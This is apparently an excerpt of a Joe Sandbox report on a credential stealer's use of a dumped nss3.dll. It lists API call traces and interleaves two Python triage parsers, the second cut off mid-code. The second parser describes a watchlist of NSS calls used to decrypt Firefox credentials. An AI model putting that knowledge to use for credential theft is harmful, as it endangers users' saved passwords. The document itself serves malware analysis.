• Instruction Fuzzy Hash: E73129B1A046558BC700CF69EC94AABBBA6AF6131CB094954EDA41FA41D371ED06CBE0
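The function blocks above all use one line shape for their API calls, and when triaging a stealer that has loaded nss3.dll an analyst usually wants them as data rather than rendered text: which function in the dumped module reaches which import, at which address, with which arguments, and which of those addresses to look up in a clean copy of the DLL. The parser below is an added example written for this edit; it is not part of the Joe Sandbox output and is not Joe Security's or Mozilla's code. Its sample input is constructed from call lines copied out of this report. It assumes every call line ends in `ref: <address>`, that argument strings contain no commas (true of the lines here), and it subtracts the `Offset:` value from the Memory Dump Source line to turn call-site addresses into RVAs that do not move with ASLR. The signed decode of PR_SetError's first argument relies on NSPR defining PR_OUT_OF_MEMORY_ERROR as -6000 in prerror.h.

```python
"""Parse the per-function API listing of a Joe Sandbox report into records.

Added example for this edit; not Joe Security's code and not part of the
sandbox output.  Assumes the line shapes seen in this report's nss3.dll
function blocks and that argument strings contain no commas.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Call lines come in three shapes:
#   • api.MODULE(arg,arg,...), ref: 6C3FBE9F
#   • api.MODULE ref: 6C5068A5                      (no argument list)
#   • Part of subcall function 6C529C40: api.MODULE(...), ref: 6C529D53
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{6,8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_-]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})\s*$"
)
# "• Source File: ....sdmp, Offset: 6C3F0000, based on PE: true"
OFFSET_LINE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]{6,8})")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]     # raw tokens; "?" means the sandbox could not resolve the value
    ref: int                  # virtual address of the call site inside the dump
    caller: Optional[int]     # set for "Part of subcall function" entries, else None


def parse_calls(text: str) -> List[ApiCall]:
    """Return every API call line in the block, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue                       # headers, "xrefs:" string lines, dump metadata
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), caller))
    return calls


def image_base(text: str) -> Optional[int]:
    """Image base of the dumped module, taken from the Offset: field."""
    m = OFFSET_LINE.search(text)
    return int(m.group("base"), 16) if m else None


def rva(address: int, base: int) -> int:
    """Relative virtual address: unlike the dump address it does not move with
    ASLR, so it can be looked up directly in a clean copy of nss3.dll."""
    return address - base


def signed32(token: str) -> int:
    """Read an 8-hex-digit argument as a signed 32-bit integer.

    NSPR and NSS error codes are negative, so PR_SetError(FFFFE890, ...) is
    PR_SetError(-6000, ...), and -6000 is PR_OUT_OF_MEMORY_ERROR in prerror.h.
    """
    value = int(token, 16) & 0xFFFFFFFF
    return value - 0x1_0000_0000 if value & 0x8000_0000 else value


def calls_by_module(calls: List[ApiCall]) -> Counter:
    """Which DLLs the function reaches, directly or through sub-calls."""
    return Counter(c.module for c in calls)


# Constructed sample: call lines copied from function blocks in this report,
# with the page's leading whitespace removed.
SAMPLE = """\
APIs
• memcmp.VCRUNTIME140(00000000,?,?), ref: 6C3FBE02
  • Part of subcall function 6C529C40: memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FBE9F
• PR_NewLock.NSS3 ref: 6C5068A5
  • Part of subcall function 6C461770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618DE
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4BFCB2
Strings
• database corruption, xrefs: 6C3FBE93
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
"""

if __name__ == "__main__":
    base = image_base(SAMPLE)
    for c in parse_calls(SAMPLE):
        where = f"{c.ref:08X} (RVA {rva(c.ref, base):X})"
        via = f" via sub-function {c.caller:08X}" if c.caller else ""
        print(f"{where}: {c.api}.{c.module}{c.args}{via}")
    print(calls_by_module(parse_calls(SAMPLE)))
```

Feed it the text of one function block at a time (the span from `APIs` to the next `Instruction Fuzzy Hash` line) to keep the caller/callee relationship per function; the RVA of each `ref:` is what to search for in a clean nss3.dll of the same build when confirming that the dumped module is unmodified.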
APIs
• PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E36
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E6E57
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E7D
• PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6EAA
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                          • String ID: nXl
                                                                                                                                                                                                                          • API String ID: 3163584228-2538165799
                                                                                                                                                                                                                          • Opcode ID: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                          • Instruction ID: c49815f9abc0e5669ee95ebcb9a269d5d8330df0aa218d38ab5b255f374e71b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931B47261061AEADB149E38CC04FD6B7A5AB0931BF12063DD699D6BC1EB30B854CB81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471EE2
                                                                                                                                                                                                                            • Part of subcall function 6C4D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C471D97,?,?), ref: 6C4D1836
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F13
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F37
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,dLGl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F53
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                          • String ID: dLGl
                                                                                                                                                                                                                          • API String ID: 3216063065-398212957
                                                                                                                                                                                                                          • Opcode ID: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                          • Instruction ID: 4678c75727577981edfe768bd4cbb2d27b52a444159335b9a39608e6206d7d3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E215071504256ABC750DE69DD10FDBB7E9AB88699F01092DEC48C3B40F730E659CBE2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A86D
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A8A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C54A89B
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C54A891
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C54A8A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                          • Opcode ID: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                          • Instruction ID: 964d37d72cc7f7c7b57013de4fe14943f3d64d1cbe433db0fd695e9eb64c5d1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6110375A00214ABDB04CF21DC51EAEBBA1FF89314F008438FC094BA80FB34A916CBD6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C460BDE), ref: 6C460DCB
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C460BDE), ref: 6C460DEA
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C460BDE), ref: 6C460DFC
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C460BDE), ref: 6C460E32
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C460E2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                                                          • Opcode ID: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                          • Instruction ID: 0ead000c01a93c8b4b947bcab1bea45ccdaaf1f3bf4255ba57cf3543ef1b12b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701B1726016209FE620DB25DC45E2773B8DF86A09B0544ADE909D3B42E7A1FC158AE5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC2D
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC44
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC59
                                                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C4F6AC6,?,?,?,?,?,?,?,?,?,?,6C505D40,00000000,?,6C50AAD4), ref: 6C51AC62
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
• String ID: @]Pl
• API String ID: 1595327144-545999589
APIs
• EnterCriticalSection.KERNEL32(?), ref: 6C409CF2
• LeaveCriticalSection.KERNEL32(?), ref: 6C409D45
• EnterCriticalSection.KERNEL32(?), ref: 6C409D8B
• LeaveCriticalSection.KERNEL32(?), ref: 6C409DDE
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
• PR_EnterMonitor.NSS3(?), ref: 6C491ECC
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
• TlsGetValue.KERNEL32 ref: 6C491EDF
• EnterCriticalSection.KERNEL32(?), ref: 6C491EEF
• PR_ExitMonitor.NSS3(?), ref: 6C491F37
• PR_Unlock.NSS3(?), ref: 6C491F44
Similarity
• API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
• String ID:
• API String ID: 3539092540-0
APIs
• TlsGetValue.KERNEL32 ref: 6C51DD8C
• LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DE1B
• ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C51DE77
Similarity
• API ID: CriticalLeaveSection$ReleaseSemaphoreValue
• String ID:
• API String ID: 2700453212-0
APIs
  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
  • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
  • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
  • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
• TlsGetValue.KERNEL32(?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFDA
• EnterCriticalSection.KERNEL32(?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFF3
• PK11_IsFriendly.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E029
• PK11_IsLoggedIn.NSS3 ref: 6C48E046
  • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
  • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
  • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
  • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
  • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
  • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
  • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
  • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
• PR_Unlock.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E149
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
• String ID:
• API String ID: 4224391822-0
• Opcode ID: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
• Instruction ID: e1869026af028a5878eb97a2e19af32a448678c643758ebec02bd3d2e935a0b9
• Opcode Fuzzy Hash: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
• Instruction Fuzzy Hash: C3513378602611CBDB10DF29C484F6ABBF1AF85309F19896CD9998BB41D731E884CBC2
APIs
• SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C49BF06
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49BF56
• PR_SetError.NSS3(FFFFE005,00000000,?,?,6C479F71,?,?,00000000), ref: 6C49BF7F
• CERT_DestroyCertificate.NSS3(00000000), ref: 6C49BFA9
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C49C014
Similarity
• API ID: Item_Util$Zfree$CertificateDestroyEncodeError
• String ID:
• API String ID: 3689625208-0
• Opcode ID: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
• Instruction ID: f6500dc44803987a25ea61dc1f1b1107328e37baef31a1bb060311911bf09f16
• Opcode Fuzzy Hash: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
• Instruction Fuzzy Hash: 1741E975B012119BEB10DE65CC80FBA7BB9AF45209F114128ED1AD7B45FB31D905CBE1
APIs
• TlsGetValue.KERNEL32 ref: 6C46EDFD
• calloc.MOZGLUE(00000001,00000000), ref: 6C46EE64
• PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C46EECC
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C46EEEB
• free.MOZGLUE(?), ref: 6C46EEF6
Similarity
• API ID: ErrorValuecallocfreememcpy
• String ID:
• API String ID: 3833505462-0
• Opcode ID: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
• Instruction ID: 1769c739fabcabf9237554b4ccb8e46445cd88f911ffd4e05541cdc027d2466b
• Opcode Fuzzy Hash: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
• Instruction Fuzzy Hash: C83134B1A006009BEB20DF2ACC84F667BF4FB46306F050629E95A87F54E731E815CBD9
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C481F1C
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C599EBC), ref: 6C481FB8
• SEC_ASN1EncodeItem_Util.NSS3(6C599E9C,?,?,6C599E9C), ref: 6C48200A
• PR_SetError.NSS3(FFFFE022,00000000), ref: 6C482020
  • Part of subcall function 6C476A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C47AD50,?,?), ref: 6C476A98
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C482030
Similarity
• API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
• String ID:
• API String ID: 1390266749-0
• Opcode ID: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
• Instruction ID: 5b94228ea7dfd8f95bfcff3d543af35f26d41ceffa2ba222fa40132b4c6fd94e
• Opcode Fuzzy Hash: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
• Instruction Fuzzy Hash: 98219375902506ABEB11DA15DC40FEA7778FF42219F140225ED3996F90EB32E528C7E2
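The bullet rows in these function records follow one fixed grammar: an API name, a dot, the exporting module, an optional argument list, and the call-site address after "ref:", with nested rows prefixed by "Part of subcall function ADDR:". The Python below is an added example for triaging such listings; it is not Joe Sandbox code and not part of this report. It parses rows copied from this listing (the SAMPLE string is constructed from them), counts calls per module, decodes the first PR_SetError argument into an NSPR/NSS error range plus offset (the bases are the ones defined in prerr.h, secerr.h and sslerr.h), and flags NSS entry points that stealers use to decrypt Firefox credentials. The watchlist is an analyst heuristic assumed for the example, not a claim the report makes.

```python
"""Parse the bullet rows of a Joe Sandbox "APIs" listing and summarise them.

Added example for this report, not Joe Sandbox code.  The row grammar
("API.MODULE(args), ref: ADDR", optionally prefixed with
"Part of subcall function ADDR:") is inferred from the rows on this page.
The error-code bases come from the NSPR/NSS headers prerr.h, secerr.h and
sslerr.h; the credential-access watchlist is an analyst heuristic (assumed),
not something the report itself asserts.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: rows copied from this listing.  It covers a subcall row,
# a row with no argument list, a string argument and several PR_SetError rows.
SAMPLE = """
  • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
• PR_Unlock.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E149
• TlsGetValue.KERNEL32 ref: 6C46EDFD
• calloc.MOZGLUE(00000001,00000000), ref: 6C46EE64
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C471E3B
• PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471E8A
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
"""

ROW_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
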